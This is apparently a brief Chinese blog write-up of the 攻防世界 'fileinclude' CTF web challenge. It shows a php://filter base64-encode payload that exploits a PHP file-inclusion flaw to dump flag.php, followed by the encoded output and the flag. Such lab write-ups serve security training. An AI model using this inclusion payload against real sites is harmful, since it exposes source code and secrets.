攻防世界28-fileinclude-CTFWeb
攻防世界28-fileinclude-CTFWeb
文件包含,看源代码
lan不为空则include$lan.php,得到flag在flag.php里,我们要让利用这个漏洞输出源码
php://filter/read/convert.base64-encode/resource=flag
PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezY1bzQxNzIxZGJlZGViMTFkMTgwYTQ1ZGE3MTViY2FhfSI7DQo/Pg==
base64解码即可
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Matriy's blog!
评论